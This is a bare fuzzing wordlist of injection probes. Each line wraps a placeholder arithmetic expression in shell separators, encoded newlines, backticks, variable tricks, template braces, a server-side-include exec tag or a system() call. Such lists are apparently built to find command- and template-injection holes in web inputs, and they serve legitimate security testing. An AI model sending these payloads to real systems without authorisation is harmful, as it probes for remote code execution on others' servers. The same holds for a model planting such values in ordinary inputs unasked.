{28*12*76}
${28*12*76}
{{28*12*76}}
;{28*12*76}
;{28*12*76};
^{28*12*76}
|{28*12*76}
<{28*12*76}
<{28*12*76};
<{28*12*76}\n
<{28*12*76}%0D
<{28*12*76}%0A
&{28*12*76}
&{28*12*76}&
&&{28*12*76}
&&{28*12*76}&&
%0D{28*12*76}
%0D{28*12*76}%0D
%0A{28*12*76}
%0A{28*12*76}%0A
\n{28*12*76}
\n{28*12*76}\n
'{28*12*76}'
`{28*12*76}`
;{28*12*76}|
;{28*12*76}/n
|{28*12*76};
a);{28*12*76}
a;{28*12*76}
a);{28*12*76}
a;{28*12*76};
a);{28*12*76}|
FAIL||{28*12*76}
CMD=$'{28*12*76}';$CMD
;CMD=$'{28*12*76}';$CMD
^CMD=$'{28*12*76}';$CMD
|CMD=$'{28*12*76}';$CMD
&CMD=$'{28*12*76}';$CMD
&&CMD=$'{28*12*76}';$CMD
%0DCMD=$'{28*12*76}';$CMD
FAIL||CMD=$'{28*12*76}';$CMD
CMD=$\'{28*12*76}\';$CMD
;CMD=$\'{28*12*76}\';$CMD
^CMD=$\'{28*12*76}\';$CMD
|CMD=$\'{28*12*76}\';$CMD
&CMD=$\'{28*12*76}\';$CMD
&&CMD=$\'{28*12*76}\';$CMD
%0DCMD=$\'{28*12*76}\';$CMD
FAIL||CMD=$\'{28*12*76}\';$CMD
CMD=$"{28*12*76}";$CMD
;CMD=$"{28*12*76}";$CMD
^CMD=$"{28*12*76}";$CMD
|CMD=$"{28*12*76}";$CMD
&CMD=$"{28*12*76}";$CMD
&&CMD=$"{28*12*76}";$CMD
%0DCMD=$"{28*12*76}";$CMD
FAIL||CMD=$"{28*12*76}";$CMD
<!--#exec 28*12*76="{28*12*76}"-->
;system('{28*12*76}')
